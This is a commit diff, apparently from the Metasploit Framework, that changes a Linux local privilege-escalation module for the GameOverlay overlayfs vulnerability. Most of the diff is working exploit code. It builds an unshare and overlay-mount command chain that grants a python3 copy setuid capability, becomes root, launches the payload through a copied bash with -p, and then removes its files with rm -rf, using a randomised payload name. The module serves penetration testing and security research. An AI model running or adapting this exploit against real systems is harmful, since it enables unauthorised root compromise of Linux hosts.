Update payload name, fix payload escapes & quotation, add unix cmd support

bwatters-r7 · bwatters-r7 · commit 59229ee61244 · 2024-12-17T16:52:24.000-06:00
diff --git a/modules/exploits/linux/local/gameoverlay_privesc.rb b/modules/exploits/linux/local/gameoverlay_privesc.rb
@@ -29,7 +29,7 @@ def initialize(info = {})
           'bwatters-r7', # MsF Module
           'gardnerapp', # MsF Module
         ],
-        'Platform' => ['linux'],
+        'Platform' => ['linux', 'unix'],
         'SessionTypes' => ['shell', 'meterpreter'],
         'DisclosureDate' => '2023-07-26',
         'References' => [
@@ -55,7 +55,7 @@ def initialize(info = {})
               'Arch' => ARCH_CMD,
               'Payload' =>
                 {
-                  'BadChars' => "\x93\x94"
+                  'BadChars' => "\x22\x27"
                 }
             }
           ]
@@ -69,7 +69,7 @@ def initialize(info = {})
     )
     register_options [
       OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp']),
-      OptString.new('PayloadFileName', [true, 'Name of payload', 'marv']),
+      OptString.new('PayloadFileName', [true, 'Name of payload', Rex::Text.rand_text_alpha(rand(8..12))])
     ]
   end
 
@@ -150,7 +150,7 @@ def exploit
     end
 
     if target.arch.first == ARCH_CMD
-      payload_cmd = "\\\"#{payload.encoded}\\\""
+      payload_cmd = payload.encoded
     else
       pay_file = datastore['PayloadFilename']
       payload_path = "#{pay_dir}#{pay_file}"
@@ -164,22 +164,24 @@ def exploit
 
     # Exploit overlayfs vuln
     # Build the command
+    rmrf_cmd = " rm -rf #{lower_dir} #{merge_dir} #{upper_dir} #{work_dir} #{bash_copy}"
 
     exploit_cmd = 'unshare -rm sh -c "'
     exploit_cmd << "cp #{cmd_exec('which python3')} #{lower_dir}; "
     exploit_cmd << "setcap cap_setuid+eip #{lower_dir}python3; "
     exploit_cmd << "mount -t overlay overlay -o rw,lowerdir=#{lower_dir},upperdir=#{upper_dir},workdir=#{work_dir} #{merge_dir} && "
-    exploit_cmd << "touch #{merge_dir}*; \" && "
+    exploit_cmd << "touch #{merge_dir}*; "
     exploit_cmd << "#{upper_dir}python3 -c 'import os;os.setuid(0);os.system("
-    exploit_cmd << "\"cp /bin/bash #{bash_copy} && chmod +x #{bash_copy} && "
-    exploit_cmd << "chmod +x #{payload_cmd} && " unless target.arch.first == ARCH_CMD
-    exploit_cmd << "#{bash_copy} -p -c "
-    exploit_cmd << payload_cmd
-    exploit_cmd << ' && ' unless target.arch.first == ARCH_CMD
-    exploit_cmd << " rm -rf #{lower_dir} #{merge_dir} #{upper_dir} #{work_dir} #{bash_copy}\")'"
-
+    exploit_cmd << "\\\"cp /bin/bash #{bash_copy} && chmod +x #{bash_copy} && "
+    if target.arch.first == ARCH_CMD
+      payload_cmd.gsub!('\\\\\\', '\\\\\\\\')
+      exploit_cmd << "#{bash_copy} -p -c \\\\\\\"(#{payload_cmd}); #{rmrf_cmd}\\\\\\\""
+    else
+      exploit_cmd << "chmod +x #{payload_cmd} && #{payload_cmd} & #{rmrf_cmd}"
+    end
+    exploit_cmd << "\\\")'\""
     output = cmd_exec(exploit_cmd)
-    print_status(output)
+    vprint_status(output)
   end
 
 end
